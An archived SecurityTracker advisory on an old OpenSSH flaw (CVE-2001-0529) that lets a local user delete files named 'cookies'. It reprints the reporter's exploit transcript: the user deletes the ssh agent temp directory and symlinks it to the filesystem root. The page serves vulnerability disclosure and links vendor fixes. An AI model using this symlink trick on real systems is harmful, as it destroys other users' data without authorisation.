SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   OpenSSH Vendors:   OpenSSH.org
OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
SecurityTracker Alert ID:  1001683
SecurityTracker URL:  http://securitytracker.com/id/1001683
CVE Reference:   CVE-2001-0529   (Links to External Site)
Updated:  Apr 26 2004
Original Entry Date:  Jun 5 2001
Impact:   Denial of service via local system, Modification of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): openssh-server-2.5.2p2-1.7.2
Description:   A vulnerability has been reported in OpenSSH that allows an authorized user to delete any file on the file system if the file is named "cookies".

A transcript of an exploit scenario is provided below:

[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

The OpenSSH vendor (www.openssh.org) has reportedly created a patch to address this issue.

Impact:   A local user can delete files named "cookies" in certain directories on the file system.
Solution:   The OpenSSH vendor (www.openssh.org) has reportedly created a patch for OpenSSH to address this issue.
Vendor URL:  www.openssh.org/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Additional Information is Provided) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
The author of the original report provides additional information about the version that was tested.
(Vulnerability Cause is Provided) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
A user provides information on the cause of the vulnerability.
(Caldera Issues Fix) OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
The vendor has released a fix.
(NetBSD Releases Fix) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
A fix is available for NetBSD.
(Immunix Issues Fix) OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
The vendor has released a fix.



 Source Message Contents

Subject:  SSH allows deletion of other users files...


SSH allows deletion of other users files.
=========================================

You can delete any file on the filesystem you want...

as long as its called cookies.


Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.

 /home/zen/.netscape/cookies

sample exploit:-

 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun  4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory


--zen-parse



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC